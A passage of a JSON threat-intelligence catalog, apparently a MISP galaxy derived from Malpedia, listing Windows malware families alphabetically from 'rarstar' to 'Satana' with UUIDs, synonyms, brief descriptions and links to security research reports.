"e0a1407f-2595-4bd2-ba16-2c6d9be4e066", "value": "rarstar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", "http://blog.trex.re.kr/3", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", "value": "RatabankaPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" ], "synonyms": [], "type": [] }, "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", "value": "RawPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" ], "synonyms": [ "Crisis", "Remote Control System" ], "type": [] }, "uuid": "c359c74e-4155-4e66-a344-b56947f75119", "value": "RCS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" ], "synonyms": [], "type": [] }, "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", "value": "rdasrv" }, { "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html" ], "synonyms": [], "type": [] }, "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", "value": "ReactorBot" }, { "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" ], "synonyms": [], "type": [] }, "uuid": "826c31ca-2617-47e4-b236-205da3881182", "value": "Reaver" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", "https://www.recordedfuture.com/redalpha-cyber-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redaman", "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" ], "synonyms": [], "type": [] }, "uuid": "97dab1f9-724a-4560-9c70-90c0d1d7fa4b", "value": "Redaman" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", "http://blog.macnica.net/blog/2017/12/post-8c22.html", "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" ], "synonyms": [], "type": [] }, "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", "value": "RedLeaves" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms", "https://www.welivesecurity.com/2013/02/04/what-do-win32redyms-and-tdl4-have-in-common/" ], "synonyms": [], "type": [] }, "uuid": "36893c2a-28ad-4dd3-a66b-906f1dd15b92", "value": "Redyms" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", "https://twitter.com/JaromirHorejsi/status/816237293073797121" ], "synonyms": [], "type": [] }, "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618", "value": "Red Alert" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler", "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf" ], "synonyms": [], "type": [] }, "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7", "value": "Red Gambler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg", "https://sensepost.com/discover/tools/reGeorg/", "https://github.com/sensepost/reGeorg" ], "synonyms": [], "type": [] }, "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad", "value": "reGeorg" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin", "https://www.youtube.com/watch?v=jeLd-gw2bWo" ], "synonyms": [], "type": [] }, "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb", "value": "Regin" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://malware-traffic-analysis.net/2017/12/22/index.html", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", "https://secrary.com/ReversingMalware/RemcosRAT/" ], "synonyms": [], "type": [] }, "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2", "value": "Remcos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", "https://securelist.com/chafer-used-remexi-malware/89538/" ], "synonyms": [], "type": [] }, "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada", "value": "Remexi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf" ], "synonyms": [], "type": [] }, "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9", "value": "Remsec" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy", "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html" ], "synonyms": [], "type": [] }, "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c", "value": "Remy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom", "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf" ], "synonyms": [], "type": [] }, "uuid": "a1f137d4-298f-4761-935d-bd39ab898479", "value": "Rerdom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup", "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/" ], "synonyms": [], "type": [] }, "uuid": "42fa55e3-e708-4c11-b807-f31573639941", "value": "Retadup" }, { "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "https://github.com/cocaman/retefe", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://www.govcert.admin.ch/blog/35/reversing-retefe", "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", "https://github.com/Tomasuh/retefe-unpacker" ], "synonyms": [ "Tsukuba", "Werdlod" ], "type": [] }, "uuid": "96bf1b6d-28e1-4dd9-aabe-23050138bc39", "value": "Retefe (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat", "https://isc.sans.edu/diary/rss/22590", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/" ], "synonyms": [ "Revetrat" ], "type": [] }, "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f", "value": "Revenge RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/" ], "synonyms": [], "type": [] }, "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", "value": "RGDoor" }, { "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof", "https://blog.avast.com/rietspoof-malware-increases-activity" ], "synonyms": [], "type": [] }, "uuid": "ec67123a-c3bc-4f46-b9f3-569c19e224ca", "value": "Rietspoof" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor", "https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf" ], "synonyms": [], "type": [] }, "uuid": "2639b71e-1bf1-4cd2-8fa2-9498e893ef3f", "value": "Rifdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043", "value": "Rikamanu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2011/Edwards-Nazario-VB2011.pdf" ], "synonyms": [], "type": [] }, "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a", "value": "Rincux" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/" ], "synonyms": [], "type": [] }, "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", "value": "Ripper ATM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/" ], "synonyms": [], "type": [] }, "uuid": "148a7078-3a38-4974-8990-9d5881f8267b", "value": "Rising Sun" }, { "description": "CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf" ], "synonyms": [ "Remote Manipulator System" ], "type": [] }, "uuid": "94339b04-9332-4691-b820-5021368f1d3a", "value": "RMS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock", "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf" ], "synonyms": [ "yellowalbatross" ], "type": [] }, "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192", "value": "rock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader", "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware" ], "synonyms": [], "type": [] }, "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e", "value": "Rockloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin" ], "synonyms": [], "type": [] }, "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", "value": "Rofin" }, { "description": "A .NET variant of ps1.roguerobin", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin", "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/" ], "synonyms": [], "type": [] }, "uuid": "25b08d2e-f803-4520-9518-4d95ce9f6ed4", "value": "RogueRobinNET" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku" ], "synonyms": [], "type": [] }, "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c", "value": "Rokku" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat", "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf", "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/", "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/", "https://www.youtube.com/watch?v=uoBQE5s2ba4", "http://v3lo.tistory.com/24", "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/" ], "synonyms": [], "type": [] }, "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", "value": "RokRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", "http://blogs.cisco.com/security/talos/rombertik" ], "synonyms": [ "CarbonGrabber" ], "type": [] }, "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", "value": "Rombertik" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" ], "synonyms": [], "type": [] }, "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", "value": "Romeo(Alfa,Bravo, ...)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" ], "synonyms": [], "type": [] }, "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", "value": "Roopirs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" ], "synonyms": [], "type": [] }, "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", "value": "Roseam" }, { "description": "Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt", "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html", "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/" ], "synonyms": [ "RotoCrypt", "Rotor" ], "type": [] }, "uuid": "f20ef9a8-6ffc-4ef2-98ba-44f6b2eab966", "value": "RotorCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" ], "synonyms": [], "type": [] }, "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", "value": "Rover" }, { "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/", "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0", "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", "https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/", "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" ], "synonyms": [ "BkLoader", "Cidox", "Mayachok" ], "type": [] }, "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", "value": "Rovnix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", "value": "RoyalCli" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", "value": "Royal DNS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" ], "synonyms": [], "type": [] }, "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", "value": "Rozena" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" ], "synonyms": [], "type": [] }, "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", "value": "RTM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" ], "synonyms": [], "type": [] }, "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", "value": "rtpos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" ], "synonyms": [], "type": [] }, "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", "value": "Ruckguv" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" ], "synonyms": [], "type": [] }, "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", "value": "Rumish" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" ], "synonyms": [], "type": [] }, "uuid": "b746a645-5974-44db-a811-a024214b7fba", "value": "running_rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" ], "synonyms": [ "RCSU" ], "type": [] }, "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", "value": "Rurktar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", "https://www.secureworks.com/blog/research-21041", "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/" ], "synonyms": [], "type": [] }, "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", "value": "Rustock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/" ], "synonyms": [], "type": [] }, "uuid": "62c79940-184e-4b8d-9237-35434bb79678", "value": "Ryuk" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", "http://malware-traffic-analysis.net/2017/10/13/index.html", "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/" ], "synonyms": [ "Saga" ], "type": [] }, "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", "value": "SAGE" }, { "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", "https://www.secureworks.com/research/sakula-malware-family" ], "synonyms": [ "Sakurel" ], "type": [] }, "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", "value": "Sakula RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" ], "synonyms": [], "type": [] }, "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", "value": "Salgorea" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf", "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf" ], "synonyms": [], "type": [] }, "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", "value": "Sality" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", "http://blog.talosintel.com/2016/03/samsam-ransomware.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" ], "synonyms": [], "type": [] }, "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", "value": "SamSam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" ], "synonyms": [ "Daws" ], "type": [] }, "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", "value": "Sanny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache", "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html" ], "synonyms": [], "type": [] }, "uuid": "056eca1f-4195-48c3-81d8-ed554dd1de20", "value": "SappyCache" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" ], "synonyms": [ "Hussarini" ], "type": [] }, "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", "value": "Sarhust" }, { "description": "Sasfis acts mostly as a downloader that has been observed to download Asprox and FakeAV. According to a VirusBulletin article from 2012, it is likely authored by the same group as SmokeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/", "https://www.symantec.com/security-center/writeup/2010-020210-5440-99", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/", "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign" ], "synonyms": [ "Oficla" ], "type": [] }, "uuid": "4c4ceb45-b326-45aa-8f1a-1229e90c78b4", "value": "Sasfis" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", "https://www.sangfor.com/source/blog-network-security/1094.html", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html", "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/", "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/" ], "synonyms": [ "DBGer", "Lucky Ransomware" ], "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", "value": "Satan Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", "https://www.cylance.com/threat-spotlight-satan-raas" ], "synonyms": [], "type": [] }, "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", "value": "Satana" }, { "description": "", "meta": { "refs": [ 